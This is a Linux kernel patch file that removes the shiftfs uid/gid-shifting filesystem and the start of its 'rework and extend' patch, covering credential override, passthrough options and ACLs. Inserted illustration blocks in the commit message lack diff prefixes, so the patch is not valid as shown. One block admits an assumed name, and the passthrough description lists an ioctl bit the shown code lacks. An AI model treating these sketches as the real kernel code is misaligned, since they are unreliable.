-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_getxattr(real, name, value, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
-+				 size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_listxattr(real, list, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_removexattr(real, name);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, const void *value, size_t size,
-+			     int flags)
-+{
-+	if (!value)
-+		return shiftfs_removexattr(dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+}
-+
-+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+{
-+	struct inode *reali;
-+
-+	if (!dentry)
-+		return;
-+
-+	reali = dentry->d_inode;
-+
-+	if (!reali->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	inode->i_mapping = reali->i_mapping;
-+	inode->i_private = dentry;
-+}
-+
-+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
-+			       umode_t mode, const char *symlink,
-+			       struct dentry *hardlink, bool excl)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+	bool op_ok = false;
-+
-+	if (hardlink) {
-+		op_ok = iop->link;
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			op_ok = iop->mkdir;
-+			break;
-+		case S_IFREG:
-+			op_ok = iop->create;
-+			break;
-+		case S_IFLNK:
-+			op_ok = iop->symlink;
-+		}
-+	}
-+	if (!op_ok)
-+		return -EINVAL;
-+
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
-+	if (!newi)
-+		return -ENOMEM;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	err = -EINVAL;		/* shut gcc up about uninit var */
-+	if (hardlink) {
-+		struct dentry *realhardlink = hardlink->d_fsdata;
-+
-+		err = vfs_link(realhardlink, reali, new, NULL);
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			err = vfs_mkdir(reali, new, mode);
-+			break;
-+		case S_IFREG:
-+			err = vfs_create(reali, new, mode, excl);
-+			break;
-+		case S_IFLNK:
-+			err = vfs_symlink(reali, new, symlink);
-+		}
-+	}
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		goto out_dput;
-+
-+	shiftfs_fill_inode(newi, new);
-+
-+	d_instantiate(dentry, newi);
-+
-+	new = NULL;
-+	newi = NULL;
-+
-+ out_dput:
-+	dput(new);
-+	iput(newi);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+			  umode_t mode,  bool excl)
-+{
-+	mode |= S_IFREG;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+}
-+
-+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+			 umode_t mode)
-+{
-+	mode |= S_IFDIR;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+}
-+
-+static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
-+			struct dentry *dentry)
-+{
-+	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+			   const char *symlink)
-+{
-+	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+}
-+
-+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	if (rmdir)
-+		err = vfs_rmdir(reali, new);
-+	else
-+		err = vfs_unlink(reali, new, NULL);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, false);
-+}
-+
-+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, true);
-+}
-+
-+static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+			  struct inode *newdir, struct dentry *new,
-+			  unsigned int flags)
-+{
-+	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
-+		*realold = old->d_fsdata,
-+		*realnew = new->d_fsdata, *trap;
-+	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	int err = -EINVAL;
-+	const struct cred *oldcred, *newcred;
-+
-+	trap = lock_rename(rndd, rodd);
-+
-+	if (trap == realold || trap == realnew)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
-+
-+	err = vfs_rename(realolddir, realold, realnewdir,
-+			 realnew, NULL, flags);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+ out_unlock:
-+	unlock_rename(rndd, rodd);
-+
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
-+				     unsigned int flags)
-+{
-+	struct dentry *real = dir->i_private, *new;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock(reali);
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	if (IS_ERR(new))
-+		return new;
-+
-+	dentry->d_fsdata = new;
-+
-+	newi = NULL;
-+	if (!new->d_inode)
-+		goto out;
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
-+	if (!newi) {
-+		dput(new);
-+		return ERR_PTR(-ENOMEM);
-+	}
-+
-+ out:
-+	return d_splice_alias(newi, dentry);
-+}
-+
-+static int shiftfs_permission(struct inode *inode, int mask)
-+{
-+	struct dentry *real = inode->i_private;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	if (mask & MAY_NOT_BLOCK)
-+		return -ECHILD;
-+
-+	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
-+	if (iop->permission)
-+		err = iop->permission(reali, mask);
-+	else
-+		err = generic_permission(reali, mask);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct iattr newattr = *attr;
-+	const struct cred *oldcred, *newcred;
-+	struct super_block *sb = dentry->d_sb;
-+	int err;
-+
-+	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
-+	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	inode_lock(reali);
-+	if (iop->setattr)
-+		err = iop->setattr(real, &newattr);
-+	else
-+		err = simple_setattr(real, &newattr);
-+	inode_unlock(reali);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		return err;
-+
-+	/* all OK, reflect the change on our inode */
-+	setattr_copy(d_inode(dentry), attr);
-+	return 0;
-+}
-+
-+static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+			   u32 request_mask, unsigned int query_flags)
-+{
-+	struct inode *inode = path->dentry->d_inode;
-+	struct dentry *real = path->dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
-+	int err = 0;
-+
-+	if (iop->getattr)
-+		err = iop->getattr(&newpath, stat, request_mask, query_flags);
-+	else
-+		generic_fillattr(reali, stat);
-+
-+	if (err)
-+		return err;
-+
-+	/* transform the underlying id */
-+	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
-+	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	return 0;
-+}
-+
-+static const struct inode_operations shiftfs_inode_ops = {
-+	.lookup		= shiftfs_lookup,
-+	.getattr	= shiftfs_getattr,
-+	.setattr	= shiftfs_setattr,
-+	.permission	= shiftfs_permission,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.get_link	= shiftfs_get_link,
-+	.readlink	= shiftfs_readlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.create		= shiftfs_create,
-+	.mknod		= NULL,	/* no special files currently */
-+	.listxattr	= shiftfs_listxattr,
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry)
-+{
-+	struct inode *inode;
-+
-+	inode = new_inode(sb);
-+	if (!inode)
-+		return NULL;
-+
-+	/*
-+	 * our inode is completely vestigial.  All lookups, getattr
-+	 * and permission checks are done on the underlying inode, so
-+	 * what the user sees is entirely from the underlying inode.
-+	 */
-+	mode &= S_IFMT;
-+
-+	inode->i_ino = get_next_ino();
-+	inode->i_mode = mode;
-+	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+
-+	inode->i_op = &shiftfs_inode_ops;
-+
-+	shiftfs_fill_inode(inode, dentry);
-+
-+	return inode;
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	if (ssi->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
-+	if (err)
-+		return err;
-+
-+	buf->f_type = sb->s_magic;
-+
-+	return 0;
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	mntput(ssi->mnt);
-+	put_user_ns(ssi->userns);
-+	kfree(ssi);
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	struct shiftfs_data *data = raw_data;
-+	char *name = kstrdup(data->path, GFP_KERNEL);
-+	int err = -ENOMEM;
-+	struct shiftfs_super_info *ssi = NULL;
-+	struct path path;
-+	struct dentry *dentry;
-+
-+	if (!name)
-+		goto out;
-+
-+	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
-+	if (!ssi)
-+		goto out;
-+
-+	err = -EPERM;
-+	err = shiftfs_parse_options(ssi, data->data);
-+	if (err)
-+		goto out;
-+
-+	/* to mark a mount point, must be real root */
-+	if (ssi->mark && !capable(CAP_SYS_ADMIN))
-+		goto out;
-+
-+	/* else to mount a mark, must be userns admin */
-+	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		goto out;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out;
-+
-+	err = -EPERM;
-+
-+	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
-+		err = -ENOTDIR;
-+		goto out_put;
-+	}
-+
-+	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put;
-+	}
-+
-+	if (ssi->mark) {
-+		/*
-+		 * this part is visible unshifted, so make sure no
-+		 * executables can be used to gain suid
-+		 * privileges
-+		 */
-+		sb->s_iflags = SB_I_NOEXEC;
-+		ssi->mnt = path.mnt;
-+		dentry = path.dentry;
-+	} else {
-+		struct shiftfs_super_info *mp_ssi;
-+
-+		/*
-+		 * this leg executes if we're admin capable in
-+		 * the namespace, so be very careful
-+		 */
-+		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
-+			goto out_put;
-+		mp_ssi = path.dentry->d_sb->s_fs_info;
-+		if (!mp_ssi->mark)
-+			goto out_put;
-+		ssi->mnt = mntget(mp_ssi->mnt);
-+		dentry = dget(path.dentry->d_fsdata);
-+		path_put(&path);
-+	}
-+	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	sb->s_fs_info = ssi;
-+	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_op = &shiftfs_super_ops;
-+	sb->s_xattr = shiftfs_xattr_handlers;
-+	sb->s_d_op = &shiftfs_dentry_ops;
-+	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_root->d_fsdata = dentry;
-+
-+	return 0;
-+
-+ out_put:
-+	path_put(&path);
-+ out:
-+	kfree(name);
-+	kfree(ssi);
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
-+				    int flags, const char *dev_name, void *data)
-+{
-+	struct shiftfs_data d = { data, dev_name };
-+
-+	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
-+}
-+
-+static struct file_system_type shiftfs_type = {
-+	.owner		= THIS_MODULE,
-+	.name		= "shiftfs",
-+	.mount		= shiftfs_mount,
-+	.kill_sb	= kill_anon_super,
-+	.fs_flags	= FS_USERNS_MOUNT,
-+};
-+
-+static int __init shiftfs_init(void)
-+{
-+	return register_filesystem(&shiftfs_type);
-+}
-+
-+static void __exit shiftfs_exit(void)
-+{
-+	unregister_filesystem(&shiftfs_type);
-+}
-+
-+MODULE_ALIAS_FS("shiftfs");
-+MODULE_AUTHOR("James Bottomley");
-+MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_LICENSE("GPL v2");
-+module_init(shiftfs_init)
-+module_exit(shiftfs_exit)
-diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
-index 6325d1d0e90f..1f70efb41565 100644
---- a/include/uapi/linux/magic.h
-+++ b/include/uapi/linux/magic.h
-@@ -102,4 +102,6 @@
- #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
- #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
- 
-+#define SHIFTFS_MAGIC		0x6a656a62
-+
- #endif /* __LINUX_MAGIC_H__ */
--- 
-2.39.2
-
-From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-/* Introduction */
-The shiftfs filesystem is implemented as a stacking filesystem. Since it is
-a stacking filesystem it shares concepts with overlayfs and ecryptfs.
-Usually, shiftfs will be stacked upon another filesystem. The filesystem on
-top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
-filesystem it is stacked upon is referred to as "lower filesystem" or
-"underlay".
-
-/* Marked and Unmarked shiftfs mounts */
-To use shiftfs it is necessary that a given mount is marked as shiftable via
-the "mark" mount option. Any mount of shiftfs without the "mark" mount option
-not on top of a shiftfs mount with the "mark" mount option will be refused with
-EPERM.
-After a marked shiftfs mount has been performed other shiftfs mounts
-referencing the marked shiftfs mount can be created. These secondary shiftfs
-mounts are usually what are of interest.
-The marked shiftfs mount will take a reference to the underlying mountpoint of
-the directory it is marking as shiftable. Any unmarked shiftfts mounts
-referencing this marked shifts mount will take a second reference to this
-directory as well. This ensures that the underlying marked shiftfs mount can be
-unmounted thereby dropping the reference to the underlying directory without
-invalidating the mountpoint of said directory since the non-marked shiftfs
-mount still holds another reference to it.
-
-/* Stacking Depth */
-Shiftfs tries to keep the stack as flat as possible to avoid hitting the
-kernel-enforced filesystem stacking limit.
-
-/* Permission Model */
-When the mark shiftfs mount is created, shiftfs will record the credentials of
-the creator of the super block and stash them in the super block. When other
-non-mark shiftfs mounts are created that reference the mark shiftfs mount, they
-will stash another reference to the creator's credentials. Before calling into
-the underlying filesystem, shiftfs will switch to the creator's credentials and
-revert to the original credentials after the underlying filesystem operation
-returns.
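
(Condensed, the switch/revert pattern looks like the following sketch, which
mirrors the shiftfs_xattr_get() hunk further down in this diff; the function
name here is invented for illustration:)

    static int xattr_get_sketch(struct shiftfs_super_info *sbinfo,
                                struct dentry *lowerd, const char *name,
                                void *value, size_t size)
    {
            const struct cred *oldcred;
            int err;

            oldcred = override_creds(sbinfo->creator_cred); /* become creator */
            err = vfs_getxattr(lowerd, name, value, size);  /* lower fs call */
            revert_creds(oldcred);                          /* back to caller */
            return err;
    }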
-
-/* Mount Options */
-- mark
-  When set the mark mount option indicates that the mount in question is
-  allowed to be shifted. Since shiftfs is mountable by user namespace root
-  in a non-initial user namespace, this mount option ensures that the system
-  administrator has decided that the marked mount is safe to be shifted.
-  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
-- passthrough={0,1,2,3}
-  This mount option functions as a bitmask. When set to a non-zero value,
-  shiftfs will try to act as an invisible shim sitting on top of the
-  underlying filesystem.
-  - 1: Shiftfs will report the filesystem type of the underlay for stat-like
-       system calls.
-  - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay.
-  - 3: Shiftfs will use both 1 and 2.
-Note that mount options on a marked mount cannot be changed.
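
(Sketch of the bitmask, based on the SHIFTFS_PASSTHROUGH_STAT define added
further down in this diff; the name of the ioctl bit is assumed here for
illustration:)

    #define SHIFTFS_PASSTHROUGH_STAT  1  /* bit 0: stat-like syscalls */
    #define SHIFTFS_PASSTHROUGH_IOCTL 2  /* bit 1: whitelisted ioctls,
                                          * name assumed */

    /* passthrough=3 enables both:
     * (SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL) == 3 */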
-
-/* Extended Attributes */
-Shiftfs will make sure to translate extended attributes.
-
-/* Inode Numbers */
-Shiftfs inode numbers are copied up from the underlying filesystem, i.e.
-shiftfs inode numbers will be identical to the corresponding underlying
-filesystem's inode numbers. This has the advantage that inotify and friends
-should work out of the box.
-(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
- dentries and inodes.)
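
(Illustration, assuming a hypothetical shiftfs mount of /var/lib/ctr at
/mnt/shifted: the inode number observed through shiftfs equals the lower
filesystem's. Error handling elided in this sketch.)

    #include <assert.h>
    #include <sys/stat.h>

    int main(void)
    {
            struct stat upper, lower;

            stat("/mnt/shifted/file", &upper);  /* through shiftfs */
            stat("/var/lib/ctr/file", &lower);  /* lower filesystem */
            assert(upper.st_ino == lower.st_ino);
            return 0;
    }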
-
-/* Device Support */
-Shiftfs only supports the creation of pipe and socket devices. Character and
-block devices cannot be created through shiftfs.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig   |   10 +
- fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
- 2 files changed, 1493 insertions(+), 369 deletions(-)
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index b53bece1e940..ada9a1234e72 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -136,6 +136,16 @@ config SHIFT_FS
- 	  unprivileged containers can use this to mount root volumes
- 	  using this technique.
- 
-+config SHIFT_FS_POSIX_ACL
-+	bool "shiftfs POSIX Access Control Lists"
-+	depends on SHIFT_FS
-+	select FS_POSIX_ACL
-+	help
-+	  POSIX Access Control Lists (ACLs) support permissions for users and
-+	  groups beyond the owner/group/world scheme.
-+
-+	  If you don't know what Access Control Lists are, say N.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f7cada126daa..ad1ae5bce6c1 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,3 +1,4 @@
-+#include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
- #include <linux/file.h>
-@@ -7,83 +8,179 @@
- #include <linux/kernel.h>
- #include <linux/magic.h>
- #include <linux/parser.h>
-+#include <linux/security.h>
- #include <linux/seq_file.h>
- #include <linux/statfs.h>
- #include <linux/slab.h>
- #include <linux/user_namespace.h>
- #include <linux/uidgid.h>
- #include <linux/xattr.h>
-+#include <linux/posix_acl.h>
-+#include <linux/posix_acl_xattr.h>
-+#include <linux/uio.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
- 	struct user_namespace *userns;
-+	/* creds of process who created the super block */
-+	const struct cred *creator_cred;
- 	bool mark;
-+	unsigned int passthrough;
-+	struct shiftfs_super_info *info_mark;
- };
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry);
-+struct shiftfs_file_info {
-+	struct path realpath;
-+	struct file *realfile;
-+};
-+
-+struct kmem_cache *shiftfs_file_info_cache;
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry);
-+
-+#define SHIFTFS_PASSTHROUGH_NONE 0
-+#define SHIFTFS_PASSTHROUGH_STAT 1
-+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+
-+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	return true;
-+}
- 
- enum {
- 	OPT_MARK,
-+	OPT_PASSTHROUGH,
- 	OPT_LAST,
- };
- 
- /* global filesystem options */
- static const match_table_t tokens = {
- 	{ OPT_MARK, "mark" },
-+	{ OPT_PASSTHROUGH, "passthrough=%u" },
- 	{ OPT_LAST, NULL }
- };
- 
--static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+static const struct cred *shiftfs_override_creds(const struct super_block *sb)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct cred *cred = prepare_creds();
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 
--	if (!cred)
--		return NULL;
-+	return override_creds(sbinfo->creator_cred);
-+}
-+
-+static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
-+					       struct cred *newcred)
-+{
-+	revert_creds(oldcred);
-+	put_cred(newcred);
-+}
-+
-+static int shiftfs_override_object_creds(const struct super_block *sb,
-+					 const struct cred **oldcred,
-+					 struct cred **newcred,
-+					 struct dentry *dentry, umode_t mode,
-+					 bool hardlink)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	if (!hardlink) {
-+		int err = security_dentry_create_files_as(dentry, mode,
-+							  &dentry->d_name,
-+							  *oldcred, *newcred);
-+		if (err) {
-+			shiftfs_revert_object_creds(*oldcred, *newcred);
-+			return err;
-+		}
-+	}
- 
--	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
--	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
--	put_user_ns(cred->user_ns);
--	cred->user_ns = get_user_ns(ssi->userns);
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
- 
--	return cred;
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
- }
- 
--static const struct cred *shiftfs_new_creds(const struct cred **newcred,
--					    struct super_block *sb)
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
- {
--	const struct cred *cred = shiftfs_get_up_creds(sb);
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
- 
--	*newcred = cred;
-+static void shiftfs_copyattr(struct inode *from, struct inode *to)
-+{
-+	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = to->i_sb->s_user_ns;
-+
-+	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
-+	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
-+	to->i_mode = from->i_mode;
-+	to->i_atime = from->i_atime;
-+	to->i_mtime = from->i_mtime;
-+	to->i_ctime = from->i_ctime;
-+	i_size_write(to, i_size_read(from));
-+}
- 
--	if (cred)
--		cred = override_creds(cred);
--	else
--		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+static void shiftfs_copyflags(struct inode *from, struct inode *to)
-+{
-+	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
- 
--	return cred;
-+	inode_set_flags(to, from->i_flags & mask, mask);
- }
- 
--static void shiftfs_old_creds(const struct cred *oldcred,
--			      const struct cred **newcred)
-+static void shiftfs_file_accessed(struct file *file)
- {
--	if (!*newcred)
-+	struct inode *upperi, *loweri;
-+
-+	if (file->f_flags & O_NOATIME)
- 		return;
- 
--	revert_creds(oldcred);
--	put_cred(*newcred);
-+	upperi = file_inode(file);
-+	loweri = upperi->i_private;
-+
-+	if (!loweri)
-+		return;
-+
-+	upperi->i_mtime = loweri->i_mtime;
-+	upperi->i_ctime = loweri->i_ctime;
-+
-+	touch_atime(&file->f_path);
- }
- 
--static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
-+				       char *options)
- {
- 	char *p;
- 	substring_t args[MAX_OPT_ARGS];
- 
--	ssi->mark = false;
-+	sbinfo->mark = false;
-+	sbinfo->passthrough = 0;
- 
- 	while ((p = strsep(&options, ",")) != NULL) {
--		int token;
-+		int err, intarg, token;
- 
- 		if (!*p)
- 			continue;
-@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
- 		token = match_token(p, tokens, args);
- 		switch (token) {
- 		case OPT_MARK:
--			ssi->mark = true;
-+			sbinfo->mark = true;
-+			break;
-+		case OPT_PASSTHROUGH:
-+			err = match_int(&args[0], &intarg);
-+			if (err)
-+				return err;
-+
-+			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
-+				return -EINVAL;
-+
-+			sbinfo->passthrough = intarg;
- 			break;
- 		default:
- 			return -EINVAL;
- 		}
- 	}
-+
- 	return 0;
- }
- 
- static void shiftfs_d_release(struct dentry *dentry)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	dput(real);
-+	if (lowerd)
-+		dput(lowerd);
- }
- 
- static struct dentry *shiftfs_d_real(struct dentry *dentry,
- 				     const struct inode *inode)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+
-+	if (inode && d_inode(dentry) == inode)
-+		return dentry;
- 
--	if (unlikely(real->d_flags & DCACHE_OP_REAL))
--		return real->d_op->d_real(real, real->d_inode);
